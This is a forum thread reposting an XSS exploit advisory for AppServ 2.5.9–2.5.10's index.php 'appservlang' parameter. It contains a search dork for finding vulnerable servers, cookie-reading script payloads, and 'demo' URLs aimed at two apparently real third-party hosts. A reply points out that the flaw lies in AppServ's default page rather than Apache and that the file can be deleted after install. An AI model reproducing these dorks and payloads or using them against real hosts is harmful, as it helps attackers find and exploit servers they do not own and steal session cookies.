Jump to content
io.kent

AppServ Open Project Vulnerabilidad XSS

Recommended Posts

Posted
Exploit Title: Apache 2.5.9=>2.5.10(win) Xss Vulnerability
Author: Angel Injection
url: http://www.appservnetwork.com
Security -::RISK: Critical
Dork For Keds: intext:"The AppServ Open Project - 2.5.10 for Windows" or intext:"The AppServ Open Project - 2.5.9 for Windows"

Exploit index.php
index.php?appservlang='"()%26%251[cross site scripting]
Code
<li><a href=\"appserv/ChangeLog.txt\"><span class=\"app\">"._CHANGELOG."</span></a></li>
<li> <a href=\"appserv/README-$appservlang.php?appservlang=$appservlang\"><span class=\"app\">"._README."</span></a></li>
<li><a href=\"appserv/AUTHORS.txt\"><span class=\"app\">"._AUTHOR."</span></a></li>
<li><a href=\"appserv/COPYING.txt\"><span class=\"app\">"._COPYING."</span></a></li>


http://server/index.php?appservlang='"()%26%251[cross site scripting]
http://server/index.php?appservlang='"()%26%251"><script>alert(document.cookie)</script>

DEMO SITE:

http://203.131.209.137/index.php?appservlang=%27%22%28%29%26%251%3Cscript%3Ealert%281337%29%3C/script%3E

http://sts.nthu.edu.tw/index.php?appservlang=%27%22%28%29%26%251%3Cscript%3Ealert%281337%29%3C/script%3E

Posted

Directory structure of www file store.

• www/appserv AppServ file, you can delete it after install.

• www/index.php AppServ index.php file you can delete it after install.

Deci nu e niciun XSS in Apache, si "exploit-ul" e un rahat, mai ales pentru ca cica: "Security -::RISK: Critical".

E problema in rahatul de pagina web a AppServ.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...